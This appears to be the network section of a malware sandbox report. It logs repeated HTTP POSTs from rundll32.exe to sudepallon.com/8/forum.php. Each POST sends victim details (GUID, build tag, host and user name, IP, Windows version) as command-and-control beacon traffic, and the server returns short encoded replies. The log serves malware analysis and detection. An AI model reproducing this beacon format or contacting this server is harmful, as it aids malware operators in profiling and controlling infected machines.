                                        Jul 9, 2021 03:08:13.278381109 CEST386OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:13.345455885 CEST386INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:14 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4a 56 45 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cJVEQARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        83192.168.2.224924877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:13.642663956 CEST387OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:13.709795952 CEST387INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:15 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 51 4a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQQJJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        84192.168.2.224924977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:13.992625952 CEST388OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:14.062663078 CEST388INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:15 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cVZAEARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        85192.168.2.224925077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:14.338475943 CEST389OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:14.405278921 CEST390INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:15 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4d 51 4a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cMQJNARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        86192.168.2.224925177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:14.687556982 CEST390OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:14.756145954 CEST391INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cKZAPARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        87192.168.2.224925277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:15.052958012 CEST391OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:15.119353056 CEST392INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 42 59 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGBYTARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        88192.168.2.224925377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:15.398942947 CEST393OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:15.466437101 CEST393INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:17 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 46 55 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQFUJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        89192.168.2.224925477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:15.866475105 CEST394OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:15.931550980 CEST394INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:17 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cHBYSARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.224917477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:07:45.168654919 CEST298OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:07:45.244801044 CEST298INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:07:46 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cBNMYARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        90192.168.2.224925577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:16.403978109 CEST395OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:16.471442938 CEST395INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQTGJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        91192.168.2.224925677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:16.741214991 CEST396OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:16.807413101 CEST396INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 4a 51 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCJQXARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        92192.168.2.224925777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:17.220598936 CEST397OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:17.285989046 CEST397INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 47 46 55 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cGFUTARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        93192.168.2.224925877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:17.762155056 CEST398OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:17.830816984 CEST399INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:19 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZNMAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        94192.168.2.224925977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:18.116822004 CEST399OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:18.184252977 CEST400INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:19 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cYGTBARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        95192.168.2.224926077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:19.112562895 CEST400OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:19.180613995 CEST401INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:20 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cQVEJARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        96192.168.2.224926177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:19.456599951 CEST402OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:19.525388002 CEST402INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 54 56 45 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cTVEGARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        97192.168.2.224926277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:19.804769993 CEST403OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:19.871977091 CEST403INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cTNMGARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        98192.168.2.224926377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:20.140988111 CEST404OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
